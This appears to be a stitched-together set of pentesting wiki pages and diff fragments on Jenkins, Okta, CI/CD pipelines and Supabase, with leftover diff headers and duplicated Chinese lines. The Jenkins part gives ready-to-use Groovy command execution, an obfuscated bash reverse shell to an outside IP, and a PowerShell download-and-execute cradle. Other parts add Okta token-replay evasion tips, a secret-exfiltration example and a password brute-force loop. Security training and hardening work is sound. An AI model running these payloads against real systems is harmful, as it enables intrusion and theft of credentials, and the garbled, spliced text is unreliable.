This is less noisy than creating a new project in Jenkins
1. Go to _path_jenkins/script_
2. Inside the text box introduce the script
```groovy
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
```
You could execute a command using: `cmd.exe /c dir`
In **linux** you can do: **`"ls /".execute().text`**
If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
**Another useful groovy script** is (replace \[INSERT COMMAND]):
```groovy
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
### Reverse shell in linux
```groovy
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
### Reverse shell in windows
You can prepare an HTTP server with a PS reverse shell and use Jenkins to download and execute it:
```bash
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
```
### Script
You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
You can use MSF to get a reverse shell:
```
msf> use exploit/multi/http/jenkins_script_console
```
{{#include ../../banners/hacktricks-training.md}}

{{#include ../../banners/hacktricks-training.md}}
## Basic Information
[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
- **Universal Directory**: Enables centralized management of users, groups, and devices.
- **API Access Management**: Secures and manages access to APIs.
These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
> [!CAUTION]
> The main goal of Okta is to configure access for different users and groups to external applications. If you manage to **compromise administrator privileges in an Okta** environment, you will most likely be able to **compromise all the other platforms the company is using**.
> [!TIP]
> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
### Summary
There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
These users can be inside **groups**.\
There are also **authenticators**: different options to authenticate such as password and several 2FA methods like WebAuthn, email, phone, Okta Verify (they can be enabled or disabled)...
Then, there are **applications** synchronized with Okta. Each application will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
> [!CAUTION]
> The most powerful role is **Super Administrator**.
>
> If an attacker compromises Okta with administrator access, all the **apps trusting Okta** will most likely be **compromised**.
## Attacks
### Locating Okta Portal
Usually the portal of a company will be located at **companyname.okta.com**. If not, try simple **variations** of **companyname**. If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
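As a quick sketch of this enumeration (the variation list and company name are illustrative assumptions, not a complete wordlist), each candidate hostname could then be probed with a DNS lookup or HTTP request:

```python
# Hypothetical helper: generate candidate Okta tenant hostnames for a
# company name so each one can be probed afterwards.
def okta_portal_candidates(company: str) -> list[str]:
    company = company.lower().replace(" ", "")
    # Illustrative naming variations, not an exhaustive wordlist
    variations = [company, f"{company}-admin", f"{company}hq", f"{company}corp"]
    hosts = [f"{v}.okta.com" for v in variations]
    # A CNAME like okta.companyname.com may also point to the Okta portal
    hosts.append(f"okta.{company}.com")
    return hosts

print(okta_portal_candidates("Example Corp"))
```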
### Login in Okta via Kerberos
If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking Okta AD Agent
This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking AD As an Admin
This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Okta Fake SAML Provider
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
### Phishing Okta Portal with Evilginx
[**这篇博客文章**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) 中解释了如何准备针对 Okta 门户的钓鱼活动。
[**This blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) explains how to prepare a phishing campaign against an Okta portal.
### Colleague Impersonation Attack
The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** **trusts** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleague's email address** and impersonate him (you will need to have access to that email and accept the change).
Note that this impersonation depends on how each application was configured. Only the ones trusting the field you modified and accepting updates will be compromised.\
Therefore, the app should have this field enabled if it exists:
<figure><img src="../../images/image (175).png" alt=""><figcaption></figcaption></figure>
I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (in the end, different apps are configured differently).
The best way to find out if you could impersonate anyone on each app would be to try it!
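The profile-update call behind the attribute attack above can be sketched as follows. This is a request that is built but not sent; the org URL, user ID and token are placeholders, and the assumption is a `POST /api/v1/users/{id}` partial profile update as in the Okta Users API:

```python
import json
import urllib.request

# Sketch: build (but do not send) the Okta API request that changes your
# own user's primaryEmail attribute. OKTA_ORG, USER_ID and the token value
# are placeholders.
OKTA_ORG = "https://companyname.okta.com"
USER_ID = "00u1abcd2EFGHIJK3456"  # hypothetical user id

def build_profile_update(token: str, new_email: str) -> urllib.request.Request:
    # Partial profile update: only the attributes you send are modified
    body = json.dumps({"profile": {"primaryEmail": new_email}}).encode()
    return urllib.request.Request(
        url=f"{OKTA_ORG}/api/v1/users/{USER_ID}",
        data=body,
        method="POST",
        headers={
            "Authorization": f"SSWS {token}",  # Okta API token header
            "Content-Type": "application/json",
        },
    )

req = build_profile_update("00a-placeholder", "victim.colleague@company.com")
print(req.get_full_url())
```

Remember that, as noted above, changing the email usually requires verifying the new address, so this only works when you can read the colleague's mailbox or the app doesn't require verification.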
## Evading behavioural detection policies <a href="#id-9fde" id="id-9fde"></a>
Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
Key recommendations include:
- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
- Ensure **consistent user-agent strings** between the client and replayed access tokens.
- **Refrain from replaying** tokens from different users from the same IP address.
- Exercise caution when replaying tokens against the Okta dashboard.
- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
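A minimal sketch of the replay idea under these recommendations (all values are placeholders; the point is targeting an app-specific URL and reusing the exact user-agent the token was captured from):

```python
import urllib.request

# Sketch: replay a captured Okta access token against an app-specific URL
# (not the main dashboard) while keeping the victim's exact user-agent.
# The URL, token and UA below are placeholders.
VICTIM_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) placeholder-UA"

def build_replay(app_url: str, access_token: str) -> urllib.request.Request:
    return urllib.request.Request(
        app_url,
        headers={
            "Authorization": f"Bearer {access_token}",
            "User-Agent": VICTIM_UA,  # must match the client the token came from
        },
    )

req = build_replay(
    "https://companyname.okta.com/app/hypothetical/sso/saml",  # app-specific URL
    "eyJ-placeholder-token",
)
print(req.get_full_url())
```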
## Okta Hardening
Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
{{#ref}}
okta-hardening.md
{{#endref}}
## References
- [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,198 +2,201 @@
{{#include ../../banners/hacktricks-training.md}}
## Directory
### People
From an attacker's perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
### Groups
This is where you find all the created groups in Okta. It's interesting to understand the different groups (sets of **permissions**) that can be granted to **users**.\
It's possible to see the **people included inside groups** and the **apps assigned** to each group.
Of course, any group with **admin** in the name is interesting, especially the group **Global Administrators**; check the members to learn who the most privileged members are.
From a whitebox review perspective, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
### Devices
Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
### Profile Editor
Here it's possible to observe how key information such as first names, last names, emails, usernames... is shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that is then used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
### Directory Integrations
Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users**, so if you **compromise that directory** you could set some attribute values in the users created in Okta and **maybe compromise the Okta env**.
### Profile Sources
A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
I haven't seen it, so any information about security and hacking regarding this option is appreciated.
## Customizations
### Brands
Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
Moreover, in the **Settings** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
### SMS
Nothing interesting here.
### End-User Dashboard
You can find here applications configured, but we will see the details of those later in a different section.
### Other
Interesting setting, but nothing super interesting from a security point of view.
## Applications
### Applications
Here you can find all the **configured applications** and their details: who has access to them, how they are configured (SAML, OpenID), the URL to log in, the mappings between Okta and the application...
In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
<figure><img src="../../images/image (283).png" alt=""><figcaption></figcaption></figure>
And you could see some more details about the app (like the password reveal feature, if it's enabled):
<figure><img src="../../images/image (220).png" alt=""><figcaption></figcaption></figure>
## Identity Governance
### Access Certifications
Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
## Security
### General
- **Security notification emails**: All should be enabled.
- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
- **User enumeration prevention**: Both should be enabled
- Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
- Self-Service Registration
- JIT flows with email authentication
- **Okta ThreatInsight settings**: Log and enforce security based on threat level
### HealthInsight
Here it's possible to find correctly and **dangerously** configured **settings**.
### Authenticators
Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
In the **Enrollment** tab you can see which ones are required or optional:
<figure><img src="../../images/image (143).png" alt=""><figcaption></figcaption></figure>
It's recommended to disable Phone. The strongest option is probably a combination of password, email and WebAuthn.
### Authentication policies
Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
Here you can find the **requirements to access each application**. It's recommended to request at least a password and another method for each application. But if, as an attacker, you find something weaker, you might be able to attack it.
### Global Session Policy
Here you can find the session policies assigned to different groups. For example:
<figure><img src="../../images/image (245).png" alt=""><figcaption></figcaption></figure>
It's recommended to require MFA, limit the session lifetime to a few hours, not persist session cookies across browser sessions, and limit the location and Identity Provider (if possible). For example, if every user should log in from one country, you could allow only that location.
### Identity Providers
身份提供者IdP是**管理用户账户**的服务。在 Okta 中添加 IdP 使您的最终用户能够通过首先使用社交账户或智能卡进行身份验证来**自助注册**您的自定义应用程序。
Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
**If any identity provider is configured**, check that configuration from an attacker's and defender's point of view, and **verify the source is really trustworthy**, as an attacker compromising it could also get access to the Okta environment.
### Delegated Authentication
Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
Again, recheck this, as an attacker compromising an organization's AD could be able to pivot to Okta thanks to this setting.
### Network
A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
From an attacker's perspective it's interesting to know which IPs are allowed (and check if any **IPs are more privileged** than others). From a defender's perspective, if users should be accessing from a specific IP address or region, check that this feature is used properly.
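The allow-list behaviour of a network zone can be illustrated with a small sketch (the CIDR ranges are made up): access is granted only when the requesting IP falls inside one of the configured ranges.

```python
import ipaddress

# Hypothetical zone definition: a corporate /24 plus one single host
ZONE = [ipaddress.ip_network(c) for c in ("203.0.113.0/24", "198.51.100.10/32")]

def ip_allowed(ip: str) -> bool:
    """Return True if the requesting IP falls inside any configured range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ZONE)

print(ip_allowed("203.0.113.55"))  # inside the corporate range -> True
print(ip_allowed("192.0.2.1"))     # outside every zone -> False
```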
### Device Integrations
- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
- I haven't seen this used yet. TODO
- **Notification services**: I haven't seen this used yet. TODO
### API
You can create Okta API tokens on this page, and see the ones that have been **created**, their **privileges**, **expiration** time and **Origin URLs**. Note that API tokens are generated with the permissions of the user that created the token and are valid only while the **user** who created them is **active**.
The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
There shouldn't be a lot of API tokens, as if there are, an attacker could try to access them and use them.
## Workflow
### Automations
Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
例如一个条件可以是“Okta 中的用户不活动”或“Okta 中的用户密码过期”,而操作可以是“向用户发送电子邮件”或“在 Okta 中更改用户生命周期状态”。
For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
## Reports
### Reports
Download logs. They are **sent** to the **email address** of the current account.
### System Log
Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
### Import Monitoring
This can **import logs from other platforms** accessed with Okta.
### Rate limits
Check the API rate limits reached.
## Settings
### Account
Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
### Downloads
Here you can download Okta agents to sync Okta with other technologies.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -6,7 +6,7 @@
## VCS
VCS **版本控制系统 (Version Control System)**,该系统允许开发者**管理他们的源代码**。最常见的是 **git**,你通常会在以下**平台**中看到公司使用它:
VCS stands for **Version Control System**; these systems allow developers to **manage their source code**. The most common one is **git** and you will usually find companies using it on one of the following **platforms**:
- Github
- Gitlab
@@ -18,93 +18,86 @@ VCS stands for **Version Control System**; these systems allow developers
## CI/CD Pipelines
CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
## VCS Pentesting Methodology
> [!NOTE]
> Even if some VCS platforms allow creating pipelines, in this section we are going to analyze only potential attacks against the control of the source code.
Platforms that host the source code of your project contain sensitive information, and people need to be very careful with the permissions granted inside these platforms. These are some common problems across VCS platforms that attackers could abuse:
- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover them.
- **Access**: If an attacker can **access an account inside the VCS platform** he could gain **more visibility and permissions**.
- **Register**: Some platforms will just allow external users to create an account.
- **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter, for example).
- **Credentials**: Username+Pwd, personal tokens, SSH keys, OAuth tokens, cookies... there are several kinds of tokens a user could steal to access a repo in some way.
- **Webhooks**: VCS platforms allow generating webhooks. If they are **not protected** with a non-visible secret, an **attacker could abuse them**.
- If no secret is in place, the attacker could abuse the webhook of the third-party platform
- If the secret is in the URL, the same happens and the attacker also has the secret
- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mind:
- Compromise the main branch to **compromise production**.
- Compromise the main (or other branches) to **compromise developers' machines** (as they usually execute tests, terraform or other things inside the repo on their machines).
- **Compromise the pipeline** (check the next section)
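The webhook-secret point above can be illustrated with a GitHub-style HMAC signature check (a sketch; the secret and payloads are made up): with a shared secret the receiver can verify each delivery, while without one anybody who knows the endpoint can forge deliveries.

```python
import hashlib
import hmac

def sign(secret: bytes, payload: bytes) -> str:
    # GitHub-style X-Hub-Signature-256 value: HMAC-SHA256 of the raw body
    return "sha256=" + hmac.new(secret, payload, hashlib.sha256).hexdigest()

def verify(secret: bytes, payload: bytes, signature: str) -> bool:
    # Constant-time comparison to avoid timing side channels
    return hmac.compare_digest(sign(secret, payload), signature)

payload = b'{"action":"push"}'
good_sig = sign(b"s3cret", payload)
print(verify(b"s3cret", payload, good_sig))          # legitimate delivery -> True
print(verify(b"s3cret", b'{"forged":1}', good_sig))  # forged payload -> False
```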
## Pipelines Pentesting Methodology
The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
> [!TIP]
> Some hosted builders allow contributors to choose the Docker build context and Dockerfile path. If the context is attacker-controllable, you can set it outside the repository (e.g. "..") to read host files during the build and exfiltrate secrets. See:
>
>{{#ref}}
>docker-build-context-abuse.md
>{{#endref}}
Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
### PPE - Poisoned Pipeline Execution
The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
For a malicious actor to be successful performing a PPE attack he needs to be able to:
- Have **write access to the VCS platform**, as pipelines are usually triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access.)
- Note that sometimes an **external PR counts as "write access"**.
- Even with write permissions, he needs to make sure he can **modify the CI config file or other files the config relies on**.
- For this, he might need to be able to **bypass branch protections**.
There are 3 PPE flavours:
- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config file** that is going to be executed.
- **I-PPE**: An **Indirect PPE** attack occurs when the actor **modifies a file** that the CI config file **relies on** (like a Makefile or a Terraform config).
- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that don't have write access to the repo** (and that might not even be part of the org) because they can send a PR.
- **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
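As a minimal sketch of the 3PE command injection case (the variable name and payload are illustrative, not taken from any specific CI platform), this is what happens when an attacker-controlled PR title ends up expanded inside a shell step:

```shell
#!/bin/sh
# Hypothetical vulnerable CI step: the PR title is template-expanded into a
# shell command before the shell parses it, so a crafted title runs commands.
PR_TITLE='my feature $(echo pwned)'   # attacker-controlled value
# Vulnerable pattern: the expanded value is re-evaluated by the shell
eval "echo Building PR: $PR_TITLE"
```

In real pipelines the same effect occurs when a template engine interpolates PR metadata directly into a run script; passing the value through a quoted intermediate environment variable (and never re-evaluating it) avoids the issue.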
### Exploitation Benefits
Knowing the 3 flavours to poison a pipeline, let's check what an attacker could obtain after a successful exploitation:
- **Secrets**: As mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and these privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as many secrets as possible.
- Depending on the pipeline platform, the attacker **might need to specify the secrets in the config**. This means that if the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he can **only exfiltrate the secrets that pipeline has**.
- **Computation**: The code is executed somewhere; depending on where it is executed, an attacker might be able to pivot further.
- **On-Premises**: If the pipelines are executed on premises, an attacker might end up in an **internal network with access to more resources**.
- **Cloud**: The attacker could access **other machines in the cloud** but could also **exfiltrate** IAM role/service account **tokens** from it to obtain **further access inside the cloud**.
- **Platforms machine**: Sometimes the jobs will be executed inside the **pipeline platform's machines**, which usually are inside a cloud with **no further access**.
- **Select it:** Sometimes the **pipeline platform will have several machines configured**, and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
- **Compromise production**: If you are inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end up running in production**.
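A poisoned job's first move is usually to dump whatever the runner exposes; a minimal sketch (the exfiltration endpoint is a placeholder and the grep pattern is just a common heuristic, not exhaustive):

```shell
#!/bin/sh
# Collect candidate secrets from the environment of a poisoned pipeline job.
env | grep -iE 'key|token|secret|pass' > /tmp/loot.txt || true
# Exfiltration step (placeholder endpoint, left commented out):
# curl -s -X POST --data-binary @/tmp/loot.txt https://attacker.example/exfil
wc -l < /tmp/loot.txt   # number of candidate variables found
```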
## More relevant info
### Tools & CIS Benchmark
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
### Top 10 CI/CD Security Risks
Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
### Labs
- For each platform that can be run locally you will find instructions on how to launch it locally, so you can configure it as you want in order to test it
- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
## References



# Supabase Security
{{#include ../banners/hacktricks-training.md}}
## Basic Information
As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
### Subdomain
Basically, when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
## **Database configuration**
> [!TIP]
> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/database`**
This **database** will be deployed in some AWS region, and in order to connect to it it's possible to use: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this one was created in us-west-1).\
The password is a **password the user set** previously.
Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
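Since only the password is unknown, a guessing loop is straightforward to sketch; this assumes `psql` is available and uses an illustrative project ref, region and wordlist (all placeholders):

```shell
#!/bin/sh
# Build the predictable connection URL for a Supabase project/region pair.
conn_url() {
  # $1 = project ref (the supabase.co subdomain), $2 = AWS region
  echo "postgres://postgres.$1@aws-0-$2.pooler.supabase.com:5432/postgres"
}

# Password-guessing loop (illustrative; wordlist.txt is a placeholder):
# while read -r pw; do
#   PGPASSWORD="$pw" psql "$(conn_url jnanozjdybtpqgcwhdiz us-west-1)" \
#     -c 'select 1' >/dev/null 2>&1 && echo "valid password: $pw"
# done < wordlist.txt
```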
This section also contains options to:
- Reset the database password
- Configure connection pooling
- Configure SSL: reject plain-text connections (by default they are allowed)
- Configure Disk size
- Apply network restrictions and bans
## API Configuration
> [!TIP]
> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/api`**
The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
### anon api keys
It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API (it's the key exposed in our example).
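These API keys are plain JWTs, so their payload (project ref, role, expiry) can be inspected offline; a small sketch assuming a POSIX shell with `base64` available:

```shell
#!/bin/sh
# Decode the payload segment of a Supabase API key (a JWT) without
# verifying the signature, to check which role it carries.
decode_jwt_payload() {
  payload=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # restore the base64 padding stripped by the JWT encoding
  while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
  printf '%s' "$payload" | base64 -d
}

decode_jwt_payload "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk"
```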
You can find the REST API reference to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints are:
<details>
<summary>Signup (/auth/v1/signup)</summary>
```
POST /auth/v1/signup HTTP/2
Host: id.io.net
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
</details>
<details>
<summary>Login (/auth/v1/token?grant_type=password)</summary>
```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
</details>
So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
### secret / service_role api keys
A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
